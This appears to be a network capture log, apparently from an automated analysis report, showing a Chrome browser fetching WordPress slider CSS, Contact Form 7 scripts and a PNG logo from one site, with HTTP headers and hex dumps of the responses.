                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 7b 32 30 25 2c 35 33 25 2c 38 30 25 2c 66 72 6f 6d 2c 74 6f 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 31 35 2c 2e 36 31 2c 2e 33 35 35 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 34 30 25 2c 34 33 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 37 35 35 2c 2e 30 35 30 2c 2e 38 35 35 2c 2e 30 36 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 33 30 70 78 2c 30 29 7d 37 30 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63
                                                                                                          Data Ascii: @keyframes bounce{20%,53%,80%,from,to{animation-timing-function:cubic-bezier(.215,.61,.355,1);transform:translate3d(0,0,0)}40%,43%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-30px,0)}70%{animation-timing-function:c
                                                                                                          2024-12-12 11:58:23 UTC2084INData Raw: 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 31 7d 40 6b 65 79 66 72 61 6d 65 73 20 65 6c 65 6d 65 6e 74 6f 72 2d 61 6e 69 6d 61 74 69 6f 6e 2d 77 6f 62 62 6c 65 2d 62 6f 74 74 6f 6d 7b 31 36 2e 36 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 28 2d 31 32 64 65 67 29 7d 33 33 2e 33 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 28 31 30 64 65 67 29 7d 34 39 2e 39 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 28 2d 36 64 65 67 29 7d 36 36 2e 36 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 28 34 64 65 67 29 7d 38 33 2e 32 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 28 2d 32 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 6b 65 77 28 30 29 7d 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 6e 69 6d 61 74 69 6f 6e 2d 77
                                                                                                          Data Ascii: on-iteration-count:1}@keyframes elementor-animation-wobble-bottom{16.65%{transform:skew(-12deg)}33.3%{transform:skew(10deg)}49.95%{transform:skew(-6deg)}66.6%{transform:skew(4deg)}83.25%{transform:skew(-2deg)}100%{transform:skew(0)}}.elementor-animation-w


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          65192.168.2.2449851147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:22 UTC653OUTGET /wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:23 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:23 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:55 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 59050
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: 2f 2a 20 46 49 58 20 46 4f 52 20 57 4f 52 44 50 52 45 53 53 27 73 20 43 52 41 5a 59 20 3c 70 3e 20 54 41 47 20 41 4e 4f 4d 41 4c 59 20 2a 2f 0d 0a 2e 72 73 2d 70 2d 77 70 2d 66 69 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0d 0a 0d 0a 2f 2a 20 4e 45 57 20 5a 2d 49 4e 44 45 58 20 46 49 58 2a 2f 0d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 74 68 65 6d 65 70 75 6e 63 68 2d 72 65 76 73 6c 69 64 65 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 20 7d 0d 0a 0d 0a 2f 2a 20 46 49 58 20 46 4f 52 20 51 55 49 43 4b 20 4c 4f 41 44 49 4e 47 20 4f 46 20 53 4c 49 44 45 52 20
                                                                                                          Data Ascii: /* FIX FOR WORDPRESS's CRAZY <p> TAG ANOMALY */.rs-p-wp-fix { display: none !important; margin: 0 !important; height: 0px !important; }/* NEW Z-INDEX FIX*/.wp-block-themepunch-revslider { position: relative }/* FIX FOR QUICK LOADING OF SLIDER
                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: 74 20 7d 2a 2f 0d 0a 0d 0a 0d 0a 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 09 2d 09 53 50 45 43 49 41 4c 20 54 50 20 43 41 50 54 49 4f 4e 53 20 2d 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 0d 0a 72 73 2d 6c 61 79 65 72 2e 72 73 2d 6e 6f 69 6e 74 65 72 61 63 74 69 6f 6e 2c 0d 0a 2e 72 73 2d 6c 61 79 65 72 2e 72 73 2d 6e 6f 69 6e 74 65 72 61 63 74 69 6f 6e 20 7b 0d 0a 09 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 0d 0a 0d 0a 7d 0d 0a 0d 0a 72 73 2d 73 74 61 74 69 63 2d 6c 61 79 65 72 73 09 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 7a 2d 69 6e 64
                                                                                                          Data Ascii: t }*//*********************************-SPECIAL TP CAPTIONS -**********************************/rs-layer.rs-nointeraction,.rs-layer.rs-nointeraction {pointer-events: none !important}rs-static-layers{position:absolute; z-ind
                                                                                                          2024-12-12 11:58:23 UTC16384INData Raw: 25 3b 0d 0a 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 74 70 2d 73 63 61 6c 65 6f 75 74 20 31 2e 30 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 40 6b 65 79 66 72 61 6d 65 73 20 74 70 2d 73 63 61 6c 65 6f 75 74 20 7b 0d 0a 20 20 30 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 30 29 3b 7d 0d 0a 20 20 31 30 30 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 30 29 3b 6f 70 61 63 69 74 79 3a 20 30 3b 7d 0d 0a 7d 0d 0a 0d 0a 0d 0a 72 73 2d 6c 6f 61 64 65 72 2e 73 70 69 6e 6e 65 72 33 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 2d 39 70 78 20 30 70 78 20 30 70 78 20 2d 33 35 70 78 3b 0d 0a 20 20 77 69 64 74 68 3a 20 37 30 70 78 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63
                                                                                                          Data Ascii: %;animation: tp-scaleout 1.0s infinite ease-in-out;}@keyframes tp-scaleout { 0% {transform: scale(0.0);} 100% {transform: scale(1.0);opacity: 0;}}rs-loader.spinner3 { margin: -9px 0px 0px -35px; width: 70px; text-align: c
                                                                                                          2024-12-12 11:58:23 UTC9898INData Raw: 6f 70 61 63 69 74 79 3a 30 7d 7d 72 73 2d 6c 6f 61 64 65 72 2e 73 70 69 6e 6e 65 72 39 7b 77 69 64 74 68 3a 34 30 70 78 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 7d 72 73 2d 6c 6f 61 64 65 72 2e 73 70 69 6e 6e 65 72 39 20 2e 72 73 2d 73 70 69 6e 6e 65 72 2d 69 6e 6e 65 72 20 73 70 61 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 6f 70 61 63 69 74 79 3a 2e 36 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b
                                                                                                          Data Ascii: opacity:0}}rs-loader.spinner9{width:40px;height:40px;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}rs-loader.spinner9 .rs-spinner-inner span{display:block;width:100%;height:100%;border-radius:50%;opacity:.6;position:absolute;top:0;


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          66192.168.2.2449855147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC643OUTGET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:25 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 04 Jul 2024 23:27:33 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 11513
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:25 UTC11513INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 69 29 3d 3e 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 74 2e 6f 28 69 2c 73 29 26 26 21 74 2e 6f 28 65 2c 73 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 69 5b 73 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 53
                                                                                                          Data Ascii: (()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,S


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          67192.168.2.2449856147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC639OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:25 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 04 Jul 2024 23:27:33 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 13054
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:25 UTC13054INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 74 3d 28 65 2c 74 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 60 77 70 63 66 37 24 7b 74 7d 60 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 61 7d 29 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 29 7d 2c 61 3d 28 65 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 69 6e 69 74 22 2c 22 69 6e 69 74 22 5d 2c 5b 22 76 61 6c 69 64 61 74 69 6f 6e 5f 66 61 69
                                                                                                          Data Ascii: (()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},a=(e,a)=>{const n=new Map([["init","init"],["validation_fai


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          68192.168.2.2449857147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:25 UTC465OUTGET /wp-content/uploads/2022/03/LOGO-NEERO-X-SITO_Tavola-disegno-1-1.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:25 UTC247INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:25 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 29 Mar 2022 23:31:26 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 290743
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:25 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c a4 00 00 05 6c 08 06 00 00 00 bc 2c a4 f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 0c a4 a0 03 00 04 00 00 00 01 00 00 05 6c 00 00 00 00 21 ec ce 0d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 01 59 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c
                                                                                                          Data Ascii: PNGIHDRl,sRGBeXIfMM*JR(iZ,,l!pHYs.#.#x?vYiTXtXML:com.adobe.xmp<x:xmpmeta xml
                                                                                                          2024-12-12 11:58:25 UTC16384INData Raw: 20 40 80 00 01 02 04 08 10 20 40 e0 60 04 3e 54 67 7a fb 38 db f3 63 d9 01 0c 97 42 e8 7f bc 4f 60 43 cf 74 71 e1 fe fd fc 81 51 80 ef d2 2f 25 b9 b9 6d f1 ef 81 e1 77 8c 6a 33 6b cd 54 d7 25 01 4a e7 46 3b 1e 1e cb ee 33 e3 a9 c5 04 02 dd 47 ee 1f 75 4f d5 3f 26 38 75 55 ae 41 20 ef e9 0e 46 ec cf 98 dc 77 fa 33 e4 b8 2a 33 9b 53 d2 93 95 bf 79 b4 e6 81 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 7b 2a e0 cb f8 3d bd b0 4e 8b 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 07 22 70 63 9d e7 db 2a bf 56 79 91 81 c2 1d 38 f0 ab b5 7f 66 4c b9 54 ea 81 ed 8f d7 8b f9 a7 fb 04 1f f4 c0 e4 4b ed 6f db 7a 05 72 cd 72 1d 92 6e a8 9c eb 9d eb b1 c8 4c 05 b5 db 5a 52 f7 a3 cf cc 95 de fd 66 6e 93 d5 0d 0a f4 35 b9 77 d4 d9 7d 66
                                                                                                          Data Ascii: @ @`>Tgz8cBO`CtqQ/%mwj3kT%JF;3GuO?&8uUA Fw3*3Sy @ @{*=N @ @"pc*Vy8fLTKozrrnLZRfn5w}f
                                                                                                          2024-12-12 11:58:25 UTC16384INData Raw: f4 54 75 62 aa f3 63 97 0d d7 d1 f6 e1 71 78 bc 2a 18 1b bc d5 81 2c c3 59 b8 d6 d1 46 65 12 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 60 af 05 04 a4 ec f5 e1 d5 39 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 6c 85 c0 d3 d5 8a 1e 00 bc a8 51 3d 4b 44 06 a3 7c b4 28 f1 8e bd df 06 af 44 bb b3 9f a7 63 ed 7d 3b d6 95 bd 68 6e 0e 68 6f ff 9c fd 22 83 41 f2 b8 f4 0c 3d f1 74 e3 4b ff 76 f3 fc a0 e6 b1 83 ec 07 59 3c 5d 83 c0 93 55 a6 e3 b1 06 dc cb 28 f2 9a c8 7b 7f e5 1f 13 f4 98 49 fb 1a ef eb 2c 3f 0b 1c d7 42 b4 21 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 58 81 fe 51 63 6c 7a e9 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 32 02 39 38 b8 07 71 8f bd 27 dd 83 82 9f 8b bc
                                                                                                          Data Ascii: Tubcqx*,YFe @ @ @`9 @ @lQ=KD|(Dc};hnho"A=tKvY<]U({I,?B!@ @ @XQclz @ @ @298q'
                                                                                                          2024-12-12 11:58:25 UTC16384INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 6c 58 40 40 ca 86 c1 55 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 2d 12 e8 c1 bd b7 44 9b 6e ae 76 8d f9 e7 fa e1 c0 f6 e7 2a df 70 36 88 2d ea e2 89 6a 4a 0f 6c 7f 3f 7a fd f3 ea 79 0e ea b6 4c 27 d0 d7 d8 f5 d1 84 3b ab 19 63 ae b1 75 b7 38 03 c9 ba 6d bd 5d 77 9d ca 3f 5c a0 7f ab 7b ac de de a7 6b 76 18 f0 d4 33 c0 64 50 56 f7 f9 70 91 d9 de 9e 4d 28 03 ec fe 7b 5e 42 ef 11 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 74 02 63 6e f8 4e d7 3a 35 13 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 ba 04 86 03 85 1f aa 4a 3e 8d ed 98 19 52 72 a0 70 a6 fb 53 ac ef c4 9a cb b0 bc d9 1e 8f 53 08 e4 7d ff 0c 30 e8 99 6b 3a 48 65 8a b6
                                                                                                          Data Ascii: @ @lX@@UG @ @-Dnv*p6-jJl?zyL';cu8m]w?\{kv3dPVpM({^B @ @ @tcnN:5 @ @ @J>RrpSS}0k:He
                                                                                                          2024-12-12 11:58:26 UTC16384INData Raw: f9 c2 c1 23 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 f6 42 40 40 ca 5e 5c 66 27 49 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 c0 96 0a 64 f0 70 0f ee bd ba 96 df 5b 39 33 5e 4c 19 28 9c ed 32 0b 46 d2 3d 8b e2 60 30 72 1f 6f ac 3a b4 e8 3a 32 40 f9 f7 8f ad f2 9d b2 41 e6 87 92 6d f4 0b 19 64 9e 6b ff 96 ca 7f 62 b4 74 6a 5f c8 e6 bd 6d cf 82 e0 f7 85 81 38 63 d1 d7 e4 96 d1 86 04 1d cd 75 5d d2 96 0e 54 bb 7b b4 27 f7 af dc 87 a4 f9 05 7e 6d 34 a1 fb cc 72 8b 96 ef e9 9f 1c 2f 24 c0 e8 6c c1 2b cb fb 65 b9 67 c6 c9 ec 2b 3f 19 2f 9e ad 8e f1 92 82 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 76 4d 60 ae 1f 26 76 cd d1 f9 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 e0 b4 04 7a 70
                                                                                                          Data Ascii: # @ @B@@^\f'I @ @dp[93^L(2F=`0ro::2@Amdkbtj_m8cu]T{'~m4r/$l+eg+?/ @ @vM`&v @ @ @zp
                                                                                                          2024-12-12 11:58:26 UTC16384INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                          2024-12-12 11:58:26 UTC16384INData Raw: f0 a3 95 df 51 99 8b 49 29 5f 62 bb 05 72 5c 90 93 9f 7f 5d 79 43 e5 4f 56 a6 7e c8 c5 c3 d4 11 62 35 81 1c 3f fd 8b ca 9f af 4c a3 5a 37 a6 57 af 20 30 5a 60 78 dc fd 3d 35 56 8e 85 6e ae ec 0b 32 a3 27 64 c0 53 15 c8 3e 30 75 e9 85 95 2f ac 7c 56 65 22 ef 3b d6 3a a2 f0 67 8b 04 52 2e 73 4c 90 f2 fa 8c c9 7c e5 c2 cd 71 d1 e3 64 b8 a7 55 fe 6c 65 6e 36 ea 36 84 ea 15 04 08 ec b8 40 7e dd 3a 91 fd 59 b6 79 71 18 02 39 1f cc 71 66 f6 0b 39 c7 17 bb 23 90 9b 7f 13 59 6f 39 de b4 dd 46 63 f3 11 e7 dc 88 9d 73 fe fc fa ea b2 d7 4c b2 ce fa 3c e1 93 d5 9f c8 74 b3 4d e6 9c 50 10 48 d9 ca 35 91 1c 73 af 33 72 13 6f e2 63 95 7d 63 ef d1 1b fe 1c a4 40 ea b4 de 7f 0c fb 67 d5 43 f9 3c ed c7 7d e3 c4 dd 47 8a 65 3f d5 0f ad a4 3c f7 c3 29 b7 56 ff 2d 93 4c ff bb
                                                                                                          Data Ascii: QI)_br\]yCOV~b5?LZ7W 0Z`x=5Vn2'dS>0u/|Ve";:gR.sL|qdUlen66@~:Yyq9qf9#Yo9FcsL<tMPH5s3roc}c@gC<}Ge?<)V-L
